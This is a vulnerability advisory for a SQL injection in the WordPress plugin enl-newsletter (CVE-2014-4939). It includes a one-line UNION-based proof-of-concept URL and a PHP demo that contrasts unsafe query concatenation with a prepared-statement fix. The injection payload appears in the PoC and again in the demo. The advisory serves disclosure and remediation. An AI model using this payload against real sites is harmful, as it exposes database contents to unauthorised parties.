wp-plugin : enl-newsletter – A1-Injection

Plugin Details

Plugin Name : enl-newsletter

Affected Version : 1.0.1 (and most probably lower versions, if any)

Vulnerability : A1-Injection

Identified by : Anant Shrivastava
Technical Details

Minimum Level of Access Required : Administrator

PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1

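The PoC above works because the `id` request parameter reaches the SQL text unmodified. The following is an added example, not code from the enl-newsletter plugin: it shows that unsafe pattern next to a hardened handler in plain PHP with PDO/SQLite so it runs without WordPress. The table name `newsletters`, its columns and the two sample rows are constructed for this demo; the `$payload` string is the `id` value from the PoC URL.

```php
<?php
// Added example (not the plugin's code). The table, columns and rows below
// are constructed for the demo; PDO/SQLite stands in for $wpdb.

function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE newsletters (id INTEGER PRIMARY KEY, name TEXT, send_mode TEXT)');
    $pdo->exec("INSERT INTO newsletters VALUES (1, 'weekly-news', 'weekly'), (2, 'monthly-digest', 'monthly')");
    return $pdo;
}

// Unsafe pattern behind the advisory: the request parameter is concatenated
// into the SQL string, so everything after the number becomes part of the
// query. Returned as text only; this demo never executes it.
function unsafe_query_text(string $id): string {
    return "SELECT * FROM newsletters WHERE id = " . $id;
}

// Hardened handler: coerce the parameter to a non-negative integer (the job
// absint() does in WordPress) and bind it, so the SQL text is fixed and only
// the leading digits of the input survive.
function safe_lookup(PDO $pdo, string $id): ?array {
    $id = (int) $id;            // "2 union select ..." becomes 2
    if ($id < 0) {
        $id = 0;                // absint-style: ids are never negative
    }
    $stmt = $pdo->prepare('SELECT id, name, send_mode FROM newsletters WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The id value from the PoC URL, as the handler would receive it after URL decoding.
$payload = '2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1';

// Show the injected statement the unsafe pattern would have sent to MySQL.
echo unsafe_query_text($payload), PHP_EOL;

// The hardened lookup only ever sees the integer 2.
$pdo = demo_db();
var_export(safe_lookup($pdo, $payload));
echo PHP_EOL;
```

Running the script prints the concatenated statement with the whole UNION clause embedded, followed by the single row with `id` 2 from the prepared lookup. Inside a WordPress plugin the equivalent of `safe_lookup` is `$wpdb->get_row($wpdb->prepare("SELECT ... WHERE id = %d", absint($_GET['id'])))`: the `%d` placeholder and `absint()` together make the parameter a bound integer rather than part of the query text.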

Disclosure Timeline

Vendor Contacted : 2013-12-28

Plugin Status : No Change

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4939

Plugin Description :

**Main Features:**

1. Set up multiple newsletters according to the post categories.
2. Different send modes include manual, weekly and monthly.
3. Custom newsletter content, template and post count.
4. Newsletter signup widget for user registration.
5. Subscriber info list containing email, IP and registration time.
6. Import WordPress users to subscriber list.

**More info:**

* http://www.wp-coder.net/enl-newsletter/
